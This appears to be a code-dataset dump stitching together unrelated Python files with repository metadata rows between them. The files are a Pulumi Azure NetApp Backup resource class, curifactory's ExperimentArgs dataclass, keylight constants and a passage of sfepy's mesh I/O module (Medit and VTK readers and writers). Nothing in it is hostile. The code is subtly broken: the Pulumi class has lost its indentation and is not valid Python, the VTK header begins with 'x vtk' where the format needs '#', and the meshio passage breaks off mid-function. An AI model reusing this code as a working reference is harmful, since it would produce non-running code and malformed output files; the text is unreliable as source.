opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
pool_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
volume_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Backup of a Volume
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the NetApp account
:param pulumi.Input[str] backup_name: The name of the backup
:param pulumi.Input[str] label: Label for backup
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] pool_name: The name of the capacity pool
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] volume_name: The name of the volume
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Backup of a Volume
:param str resource_name: The name of the resource.
:param BackupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
pool_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
volume_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackupArgs.__new__(BackupArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["backup_name"] = backup_name
__props__.__dict__["label"] = label
__props__.__dict__["location"] = location
if pool_name is None and not opts.urn:
raise TypeError("Missing required property 'pool_name'")
__props__.__dict__["pool_name"] = pool_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if volume_name is None and not opts.urn:
raise TypeError("Missing required property 'volume_name'")
__props__.__dict__["volume_name"] = volume_name
__props__.__dict__["backup_id"] = None
__props__.__dict__["backup_type"] = None
__props__.__dict__["creation_date"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["size"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:netapp/v20200801:Backup"), pulumi.Alias(type_="azure-native:netapp:Backup"), pulumi.Alias(type_="azure-nextgen:netapp:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200501:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200501:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200601:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200601:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200701:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200701:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200901:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200901:Backup"), pulumi.Alias(type_="azure-native:netapp/v20201101:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20201101:Backup"), pulumi.Alias(type_="azure-native:netapp/v20201201:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20201201:Backup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Backup, __self__).__init__(
'azure-native:netapp/v20200801:Backup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Backup':
"""
Get an existing Backup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = BackupArgs.__new__(BackupArgs)
__props__.__dict__["backup_id"] = None
__props__.__dict__["backup_type"] = None
__props__.__dict__["creation_date"] = None
__props__.__dict__["label"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["size"] = None
__props__.__dict__["type"] = None
return Backup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[str]:
"""
UUID v4 used to identify the Backup
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="backupType")
def backup_type(self) -> pulumi.Output[str]:
"""
        Type of backup: Manual or Scheduled
"""
return pulumi.get(self, "backup_type")
@property
@pulumi.getter(name="creationDate")
def creation_date(self) -> pulumi.Output[str]:
"""
The creation date of the backup
"""
return pulumi.get(self, "creation_date")
@property
@pulumi.getter
def label(self) -> pulumi.Output[Optional[str]]:
"""
Label for backup
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Azure lifecycle management
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def size(self) -> pulumi.Output[float]:
"""
Size of backup
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
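# Usage sketch (illustration only): creating a backup of an existing NetApp
# volume inside a Pulumi program; all resource names below are hypothetical.
#
#     import pulumi_azure_native.netapp.v20200801 as netapp
#
#     backup = netapp.Backup(
#         "nightlyBackup",
#         resource_group_name="my-rg",
#         account_name="my-netapp-account",
#         pool_name="my-pool",
#         volume_name="my-volume",
#         label="nightly",
#         location="westus2",
#     )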
| 39.718654
| 941
| 0.626501
|
1ef108fb1d3c1287652605afb77ef8631a632965
| 1,275
|
py
|
Python
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | 4
|
2022-01-25T18:27:49.000Z
|
2022-03-30T22:57:04.000Z
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | 1
|
2022-03-05T19:10:42.000Z
|
2022-03-07T18:00:49.000Z
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | null | null | null |
"""Contains the parent dataclass ExperimentArgs, containing run-specific config params."""
from dataclasses import dataclass
@dataclass
class ExperimentArgs:
"""Base arguments class, for handling naming and hashing.
In any given repo, this class should be extended to contain any needed
local configuration.
.. note::
Extending with a :code:`@dataclass` is recommended to make it syntactically
easier to read and define.
Example:
.. code-block:: python
from dataclasses import dataclass
from curifactory import ExperimentArgs
@dataclass
class Args(ExperimentArgs):
some_parameter: int = 0
# ...
"""
name: str = "UNNAMED"
"""Argument set name. This can be used to easily distinguish/refer to specific
configurations in aggregate stages. This should be unique for every args instance."""
hash: str = None
"""Curifactory automatically fills this, but it can be overriden if you need to use
very specific cache naming. (Should not normally be necessary.)"""
overwrite: bool = False
"""Whether to overwrite pre-cached values. Curifactory automatically sets this based
on command line flags."""
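# Usage sketch (illustration only): instantiating the ``Args`` subclass from the
# docstring example above.
#
#     args = Args(name="baseline", some_parameter=3)
#     variant = Args(name="bigger", some_parameter=10)
#
# Each instance should get a unique ``name``; ``hash`` is normally left for
# curifactory to fill in, and ``overwrite`` is usually driven by CLI flags.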
| 32.692308
| 93
| 0.66902
|
55d9b7698d5862f4256c659b6477b42d7684c377
| 189
|
py
|
Python
|
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | 4
|
2021-02-05T02:55:33.000Z
|
2022-02-02T23:21:19.000Z
|
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | null | null | null |
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | null | null | null |
MIN_BRIGHTNESS = 0
MAX_BRIGHTNESS = 100
MIN_COLOR = 2900
# Although the API accepts values up to 7000, 6987 is the maximum that was observed to work.
MAX_COLOR = 6987
DEFAULT_PORT = 9123
| 21
| 92
| 0.772487
|
fbf4d49332ae1cba3e32ca329c10c0a8d72992c4
| 91,766
|
py
|
Python
|
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
from copy import copy
import numpy as nm
from sfepy.base.base import (complex_types, dict_from_keys_init,
assert_, is_derived_class, ordered_iteritems,
insert_static_method, output, get_default,
get_default_attr, Struct, basestr)
from sfepy.base.ioutils \
import skip_read_line, read_token, read_array, read_list, pt
import os.path as op
supported_formats = {
'.mesh' : 'medit',
'.vtk' : 'vtk',
'.node' : 'tetgen',
'.txt' : 'comsol',
'.h5' : 'hdf5',
# Order is important, avs_ucd does not guess -> it is the default.
'.inp' : ('abaqus', 'ansys_cdb', 'avs_ucd'),
'.dat' : 'ansys_cdb',
'.hmascii' : 'hmascii',
'.mesh3d' : 'mesh3d',
'.bdf' : 'nastran',
'.neu' : 'gambit',
'.med' : 'med',
'.cdb' : 'ansys_cdb',
'.msh' : 'msh_v2',
}
# Map mesh formats to read and write capabilities.
# 'r' ... read mesh
# 'w' ... write mesh
# 'rn' ... read nodes for boundary conditions
# 'wn' ... write nodes for boundary conditions
supported_capabilities = {
'medit' : ['r', 'w'],
'vtk' : ['r', 'w'],
'tetgen' : ['r'],
'comsol' : ['r', 'w'],
'hdf5' : ['r', 'w'],
'abaqus' : ['r'],
'avs_ucd' : ['r'],
'hmascii' : ['r'],
'mesh3d' : ['r'],
'nastran' : ['r', 'w'],
'gambit' : ['r', 'rn'],
'med' : ['r'],
'ansys_cdb' : ['r'],
'msh_v2' : ['r'],
}
supported_cell_types = {
'medit' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'vtk' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'tetgen' : ['tetra4'],
'comsol' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'hdf5' : ['user'],
'abaqus' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'avs_ucd' : ['tetra4', 'hexa8'],
'hmascii' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'mesh3d' : ['tetra4', 'hexa8'],
'nastran' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'gambit' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'med' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'ansys_cdb' : ['tetra4', 'hexa8'],
'msh_v2' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'function' : ['user'],
}
def output_mesh_formats(mode='r'):
for key, vals in ordered_iteritems(supported_formats):
if isinstance(vals, basestr):
vals = [vals]
for val in vals:
caps = supported_capabilities[val]
if mode in caps:
output('%s (%s), cell types: %s'
% (val, key, supported_cell_types[val]))
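# Usage sketch (illustration only): listing the formats this module can handle.
#
#     output_mesh_formats('r')   # formats that support reading a mesh
#     output_mesh_formats('w')   # formats that support writing a mesh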
def split_conns_mat_ids(conns_in):
"""
Split connectivities (columns except the last ones in `conns_in`) from cell
groups (the last columns of `conns_in`).
"""
conns, mat_ids = [], []
for conn in conns_in:
conn = nm.asarray(conn, dtype=nm.int32)
conns.append(conn[:, :-1])
mat_ids.append(conn[:, -1])
return conns, mat_ids
def convert_complex_output(out_in):
"""
Convert complex values in the output dictionary `out_in` to pairs of
real and imaginary parts.
"""
out = {}
for key, val in out_in.iteritems():
if val.data.dtype in complex_types:
rval = copy(val)
rval.data = val.data.real
out['real(%s)' % key] = rval
ival = copy(val)
ival.data = val.data.imag
out['imag(%s)' % key] = ival
else:
out[key] = val
return out
def _read_bounding_box(fd, dim, node_key,
c0=0, ndplus=1, ret_fd=False, ret_dim=False):
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == node_key:
num = int(read_token(fd))
nod = read_array(fd, num, dim + ndplus, nm.float64)
break
bbox = nm.vstack((nm.amin(nod[:,c0:(dim + c0)], 0),
nm.amax(nod[:,c0:(dim + c0)], 0)))
if ret_dim:
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
class MeshIO(Struct):
"""
The abstract class for importing and exporting meshes.
Read the docstring of the Mesh() class. Basically all you need to do is to
implement the read() method::
def read(self, mesh, **kwargs):
nodes = ...
ngroups = ...
conns = ...
mat_ids = ...
descs = ...
mesh._set_io_data(nodes, ngroups, conns, mat_ids, descs)
return mesh
See the Mesh class' docstring how the nodes, ngroups, conns, mat_ids and
descs should look like. You just need to read them from your specific
format from disk.
To write a mesh to disk, just implement the write() method and use the
information from the mesh instance (e.g. nodes, conns, mat_ids and descs)
to construct your specific format.
The methods read_dimension(), read_bounding_box() should be implemented in
subclasses, as it is often possible to get that kind of information without
reading the whole mesh file.
Optionally, subclasses can implement read_data() to read also computation
results. This concerns mainly the subclasses with implemented write()
supporting the 'out' kwarg.
    The default implementation of read_last_step() just returns 0. It should be
reimplemented in subclasses capable of storing several steps.
"""
format = None
call_msg = 'called an abstract MeshIO instance!'
def __init__(self, filename, **kwargs):
Struct.__init__(self, filename=filename, **kwargs)
self.set_float_format()
def get_filename_trunk(self):
if isinstance(self.filename, file):
trunk = 'from_descriptor'
else:
trunk = op.splitext(self.filename)[0]
return trunk
def read_dimension(self, ret_fd=False):
raise ValueError(MeshIO.call_msg)
def read_bounding_box(self, ret_fd=False, ret_dim=False):
raise ValueError(MeshIO.call_msg)
def read_last_step(self):
"""The default implementation: just return 0 as the last step."""
return 0
def read_times(self, filename=None):
"""
Read true time step data from individual time steps.
Returns
-------
steps : array
The time steps.
times : array
The times of the time steps.
nts : array
The normalized times of the time steps, in [0, 1].
Notes
-----
The default implementation returns empty arrays.
"""
aux = nm.array([0.0], dtype=nm.float64)
return aux.astype(nm.int32), aux, aux
def read(self, mesh, omit_facets=False, **kwargs):
raise ValueError(MeshIO.call_msg)
def write(self, filename, mesh, **kwargs):
raise ValueError(MeshIO.call_msg)
def read_data(self, step, filename=None):
raise ValueError(MeshIO.call_msg)
def set_float_format(self, format=None):
self.float_format = get_default(format, '%e')
def get_vector_format(self, dim):
return ' '.join([self.float_format] * dim)
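# Illustration only (not part of the original sfepy sources): a minimal reader
# skeleton following the recipe in the MeshIO docstring above. The "format" it
# claims to handle is hypothetical; it simply hands a hard-coded two-triangle
# mesh to _set_io_data() to show the expected shapes of the data.
class _ExampleMeshIO(MeshIO):
    format = 'example'
    def read(self, mesh, **kwargs):
        nodes = nm.array([[0.0, 0.0], [1.0, 0.0],
                          [1.0, 1.0], [0.0, 1.0]], dtype=nm.float64)
        ngroups = nm.zeros(4, dtype=nm.int32)
        conns = [nm.array([[0, 1, 2], [0, 2, 3]], dtype=nm.int32)]
        mat_ids = [nm.zeros(2, dtype=nm.int32)]
        descs = ['2_3']
        mesh._set_io_data(nodes, ngroups, conns, mat_ids, descs)
        return mesh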
class UserMeshIO(MeshIO):
"""
Special MeshIO subclass that enables reading and writing a mesh using a
user-supplied function.
"""
format = 'function'
def __init__(self, filename, **kwargs):
assert_(hasattr(filename, '__call__'))
self.function = filename
MeshIO.__init__(self, filename='function:%s' % self.function.__name__,
**kwargs)
def get_filename_trunk(self):
return self.filename
def read(self, mesh, *args, **kwargs):
aux = self.function(mesh, mode='read')
if aux is not None:
mesh = aux
self.filename = mesh.name
return mesh
def write(self, filename, mesh, *args, **kwargs):
self.function(mesh, mode='write')
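# Usage sketch (illustration only): UserMeshIO takes a callable instead of a
# file name; the callable receives the mesh and a mode of 'read' or 'write'.
# A hypothetical hook:
#
#     def mesh_hook(mesh, mode):
#         if mode == 'read':
#             # fill the mesh, e.g. via mesh._set_io_data(...), or return a new Mesh
#             return mesh
#         elif mode == 'write':
#             pass  # e.g. post-process or export the mesh yourself
#
#     io = UserMeshIO(mesh_hook)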
class MeditMeshIO(MeshIO):
format = 'medit'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'Dimension':
if len(line) == 2:
dim = int(line[1])
else:
dim = int(fd.readline())
break
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = open(self.filename, 'r')
dim, fd = self.read_dimension(ret_fd=True)
return _read_bounding_box(fd, dim, 'Vertices',
ret_fd=ret_fd, ret_dim=ret_dim)
def read(self, mesh, omit_facets=False, **kwargs):
dim, fd = self.read_dimension(ret_fd=True)
conns_in = []
descs = []
def _read_cells(dimension, size, has_id=True):
num = int(read_token(fd))
data = read_array(fd, num, size + 1 * has_id, nm.int32)
if omit_facets and (dimension < dim): return
data[:, :-1] -= 1
conns_in.append(data)
descs.append('%i_%i' % (dimension, size))
while 1:
line = skip_read_line(fd).split()
if not line:
break
ls = line[0]
if (ls == 'Vertices'):
num = int(read_token(fd))
nod = read_array(fd, num, dim + 1, nm.float64)
elif (ls == 'Corners'):
_read_cells(1, 1, False)
elif (ls == 'Edges'):
_read_cells(1, 2)
elif (ls == 'Tetrahedra'):
_read_cells(3, 4)
elif (ls == 'Hexahedra'):
_read_cells(3, 8)
elif (ls == 'Triangles'):
_read_cells(2, 3)
elif (ls == 'Quadrilaterals'):
_read_cells(2, 4)
elif ls == 'End':
break
elif line[0] == '#':
continue
else:
output('skipping unknown entity: %s' % line)
continue
fd.close()
        # Detect wedges and pyramids -> separate groups.
if ('3_8' in descs):
ic = descs.index('3_8')
conn_in = conns_in.pop(ic)
flag = nm.zeros((conn_in.shape[0],), nm.int32)
for ii, el in enumerate(conn_in):
if (el[4] == el[5]):
if (el[5] == el[6]):
flag[ii] = 2
else:
flag[ii] = 1
conn = []
desc = []
ib = nm.where(flag == 0)[0]
if (len(ib) > 0):
conn.append(conn_in[ib])
desc.append('3_8')
iw = nm.where(flag == 1)[0]
if (len(iw) > 0):
ar = nm.array([0,1,2,3,4,6], nm.int32)
conn.append(conn_in[iw[:, None], ar])
desc.append('3_6')
ip = nm.where(flag == 2)[0]
if (len(ip) > 0):
ar = nm.array([0,1,2,3,4], nm.int32)
conn.append(conn_in[ip[:, None], ar])
desc.append('3_5')
conns_in[ic:ic] = conn
del(descs[ic])
descs[ic:ic] = desc
conns, mat_ids = split_conns_mat_ids(conns_in)
mesh._set_io_data(nod[:,:-1], nod[:,-1], conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, **kwargs):
fd = open(filename, 'w')
coors, ngroups, conns, mat_ids, desc = mesh._get_io_data()
n_nod, dim = coors.shape
fd.write("MeshVersionFormatted 1\nDimension %d\n" % dim)
fd.write("Vertices\n%d\n" % n_nod)
format = self.get_vector_format(dim) + ' %d\n'
for ii in range(n_nod):
nn = tuple(coors[ii]) + (ngroups[ii],)
fd.write(format % tuple(nn))
for ig, conn in enumerate(conns):
ids = mat_ids[ig]
if (desc[ig] == "1_1"):
fd.write("Corners\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d\n"
% nn[0])
elif (desc[ig] == "1_2"):
fd.write("Edges\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d\n"
% (nn[0], nn[1], ids[ii]))
elif (desc[ig] == "2_4"):
fd.write("Quadrilaterals\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], ids[ii]))
elif (desc[ig] == "2_3"):
fd.write("Triangles\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d\n" % (nn[0], nn[1], nn[2], ids[ii]))
elif (desc[ig] == "3_4"):
fd.write("Tetrahedra\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], ids[ii]))
elif (desc[ig] == "3_8"):
fd.write("Hexahedra\n%d\n" % conn.shape[0])
for ii in range(conn.shape[0]):
nn = conn[ii] + 1
fd.write("%d %d %d %d %d %d %d %d %d\n"
% (nn[0], nn[1], nn[2], nn[3], nn[4], nn[5],
nn[6], nn[7], ids[ii]))
else:
raise ValueError('unknown element type! (%s)' % desc[ig])
fd.close()
if out is not None:
for key, val in out.iteritems():
raise NotImplementedError
vtk_header = r"""x vtk DataFile Version 2.0
step %d time %e normalized time %e, generated by %s
ASCII
DATASET UNSTRUCTURED_GRID
"""
vtk_cell_types = {'1_1' : 1, '1_2' : 3, '2_2' : 3, '3_2' : 3,
'2_3' : 5, '2_4' : 9, '3_4' : 10, '3_8' : 12}
vtk_dims = {1 : 1, 3 : 1, 5 : 2, 9 : 2, 10 : 3, 12 : 3}
vtk_inverse_cell_types = {3 : '1_2', 5 : '2_3', 8 : '2_4', 9 : '2_4',
10 : '3_4', 11 : '3_8', 12 : '3_8'}
vtk_remap = {8 : nm.array([0, 1, 3, 2], dtype=nm.int32),
11 : nm.array([0, 1, 3, 2, 4, 5, 7, 6], dtype=nm.int32)}
vtk_remap_keys = vtk_remap.keys()
class VTKMeshIO(MeshIO):
format = 'vtk'
def read_coors(self, ret_fd=False):
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'POINTS':
n_nod = int(line[1])
coors = read_array(fd, n_nod, 3, nm.float64)
break
if ret_fd:
return coors, fd
else:
fd.close()
return coors
def get_dimension(self, coors):
dz = nm.diff(coors[:,2])
if nm.allclose(dz, 0.0):
dim = 2
else:
dim = 3
return dim
def read_dimension(self, ret_fd=False):
coors, fd = self.read_coors(ret_fd=True)
dim = self.get_dimension(coors)
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
coors, fd = self.read_coors(ret_fd=True)
dim = self.get_dimension(coors)
bbox = nm.vstack((nm.amin(coors[:,:dim], 0),
nm.amax(coors[:,:dim], 0)))
if ret_dim:
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
def read(self, mesh, **kwargs):
fd = open(self.filename, 'r')
mode = 'header'
mode_status = 0
coors = conns = mat_id = node_grps = None
finished = 0
while 1:
line = skip_read_line(fd)
if not line:
break
if mode == 'header':
if mode_status == 0:
if line.strip() == 'ASCII':
mode_status = 1
elif mode_status == 1:
if line.strip() == 'DATASET UNSTRUCTURED_GRID':
mode_status = 0
mode = 'points'
elif mode == 'points':
line = line.split()
if line[0] == 'POINTS':
n_nod = int(line[1])
coors = read_array(fd, n_nod, 3, nm.float64)
mode = 'cells'
elif mode == 'cells':
line = line.split()
if line[0] == 'CELLS':
n_el, n_val = map(int, line[1:3])
raw_conn = read_list(fd, n_val, int)
mode = 'cell_types'
elif mode == 'cell_types':
line = line.split()
if line[0] == 'CELL_TYPES':
assert_(int(line[1]) == n_el)
cell_types = read_array(fd, n_el, 1, nm.int32)
mode = 'cp_data'
elif mode == 'cp_data':
line = line.split()
if line[0] == 'CELL_DATA':
assert_(int(line[1]) == n_el)
mode_status = 1
mode = 'mat_id'
elif line[0] == 'POINT_DATA':
assert_(int(line[1]) == n_nod)
mode_status = 1
mode = 'node_groups'
elif mode == 'mat_id':
if mode_status == 1:
if 'SCALARS mat_id int' in line.strip():
mode_status = 2
elif mode_status == 2:
if line.strip() == 'LOOKUP_TABLE default':
mat_id = read_list(fd, n_el, int)
mode_status = 0
mode = 'cp_data'
finished += 1
elif mode == 'node_groups':
if mode_status == 1:
if 'SCALARS node_groups int' in line.strip():
mode_status = 2
elif mode_status == 2:
if line.strip() == 'LOOKUP_TABLE default':
node_grps = read_list(fd, n_nod, int)
mode_status = 0
mode = 'cp_data'
finished += 1
elif finished >= 2:
break
fd.close()
if mat_id is None:
mat_id = [[0]] * n_el
else:
if len(mat_id) < n_el:
mat_id = [[ii] for jj in mat_id for ii in jj]
if node_grps is None:
node_grps = [0] * n_nod
else:
if len(node_grps) < n_nod:
node_grps = [ii for jj in node_grps for ii in jj]
dim = self.get_dimension(coors)
if dim == 2:
coors = coors[:,:2]
coors = nm.ascontiguousarray(coors)
cell_types = cell_types.squeeze()
dconns = {}
for iel, row in enumerate(raw_conn):
vct = cell_types[iel]
if vct not in vtk_inverse_cell_types:
continue
ct = vtk_inverse_cell_types[vct]
dconns.setdefault(vct, []).append(row[1:] + mat_id[iel])
descs = []
conns = []
mat_ids = []
for ct, conn in dconns.iteritems():
sct = vtk_inverse_cell_types[ct]
descs.append(sct)
aux = nm.array(conn, dtype=nm.int32)
aconn = aux[:, :-1]
if ct in vtk_remap_keys: # Remap pixels and voxels.
aconn[:] = aconn[:, vtk_remap[ct]]
conns.append(aconn)
mat_ids.append(aux[:, -1])
mesh._set_io_data(coors, node_grps, conns, mat_ids, descs)
return mesh
def write(self, filename, mesh, out=None, ts=None, **kwargs):
def _reshape_tensors(data, dim, sym, nc):
if dim == 3:
if nc == sym:
aux = data[:, [0,3,4,3,1,5,4,5,2]]
elif nc == (dim * dim):
aux = data[:, [0,3,4,6,1,5,7,8,2]]
else:
aux = data.reshape((data.shape[0], dim*dim))
else:
zz = nm.zeros((data.shape[0], 1), dtype=nm.float64)
if nc == sym:
aux = nm.c_[data[:,[0,2]], zz, data[:,[2,1]],
zz, zz, zz, zz]
elif nc == (dim * dim):
aux = nm.c_[data[:,[0,2]], zz, data[:,[3,1]],
zz, zz, zz, zz]
else:
aux = nm.c_[data[:,0,[0,1]], zz, data[:,1,[0,1]],
zz, zz, zz, zz]
return aux
def _write_tensors(data):
format = self.get_vector_format(3)
format = '\n'.join([format] * 3) + '\n\n'
for row in aux:
fd.write(format % tuple(row))
if ts is None:
step, time, nt = 0, 0.0, 0.0
else:
step, time, nt = ts.step, ts.time, ts.nt
coors, ngroups, conns, mat_ids, descs = mesh._get_io_data()
fd = open(filename, 'w')
fd.write(vtk_header % (step, time, nt, op.basename(sys.argv[0])))
n_nod, dim = coors.shape
sym = dim * (dim + 1) / 2
fd.write('\nPOINTS %d float\n' % n_nod)
aux = coors
if dim < 3:
aux = nm.hstack((aux, nm.zeros((aux.shape[0], 3 - dim),
dtype=aux.dtype)))
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row))
n_el = mesh.n_el
n_els, n_e_ps = nm.array([conn.shape for conn in conns]).T
total_size = nm.dot(n_els, n_e_ps + 1)
fd.write('\nCELLS %d %d\n' % (n_el, total_size))
ct = []
for ig, conn in enumerate(conns):
nn = n_e_ps[ig] + 1
ct += [vtk_cell_types[descs[ig]]] * n_els[ig]
format = ' '.join(['%d'] * nn + ['\n'])
for row in conn:
fd.write(format % ((nn-1,) + tuple(row)))
fd.write('\nCELL_TYPES %d\n' % n_el)
fd.write(''.join(['%d\n' % ii for ii in ct]))
fd.write('\nPOINT_DATA %d\n' % n_nod)
# node groups
fd.write('\nSCALARS node_groups int 1\nLOOKUP_TABLE default\n')
fd.write(''.join(['%d\n' % ii for ii in ngroups]))
if out is not None:
point_keys = [key for key, val in out.iteritems()
if val.mode == 'vertex']
else:
point_keys = {}
for key in point_keys:
val = out[key]
nr, nc = val.data.shape
if nc == 1:
fd.write('\nSCALARS %s float %d\n' % (key, nc))
fd.write('LOOKUP_TABLE default\n')
format = self.float_format + '\n'
for row in val.data:
fd.write(format % row)
elif nc == dim:
fd.write('\nVECTORS %s float\n' % key)
if dim == 2:
aux = nm.hstack((val.data,
nm.zeros((nr, 1), dtype=nm.float64)))
else:
aux = val.data
format = self.get_vector_format(3) + '\n'
for row in aux:
fd.write(format % tuple(row))
elif (nc == sym) or (nc == (dim * dim)):
fd.write('\nTENSORS %s float\n' % key)
aux = _reshape_tensors(val.data, dim, sym, nc)
_write_tensors(aux)
else:
raise NotImplementedError, nc
if out is not None:
cell_keys = [key for key, val in out.iteritems()
if val.mode == 'cell']
else:
cell_keys = {}
fd.write('\nCELL_DATA %d\n' % n_el)
# cells - mat_id
fd.write('SCALARS mat_id int 1\nLOOKUP_TABLE default\n')
aux = nm.hstack(mat_ids).tolist()
fd.write(''.join(['%d\n' % ii for ii in aux]))
for key in cell_keys:
val = out[key]
ne, aux, nr, nc = val.data.shape
